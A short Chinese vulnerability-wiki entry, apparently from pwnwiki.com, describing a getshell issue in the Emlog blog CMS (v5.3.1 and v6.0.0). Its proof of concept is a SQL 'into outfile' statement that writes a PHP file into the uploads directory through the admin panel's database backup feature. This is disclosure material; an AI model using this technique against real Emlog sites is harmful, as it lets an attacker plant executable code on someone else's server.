免费、自由、人人可编辑的漏洞库
,
影响版本
Emlog v5.3.1 Emlog v6.0.0
POC
select "<?php phpinfo();?>" into outfile "/var/www/html/tet1/emlog_6.0.0/src/content/uploadfile/202104/222.php";
通过在后台数据-备份数据库进行构造恶意sql语句进行备份上传-getshell
pwnwiki.com
◆◆0
返回顶部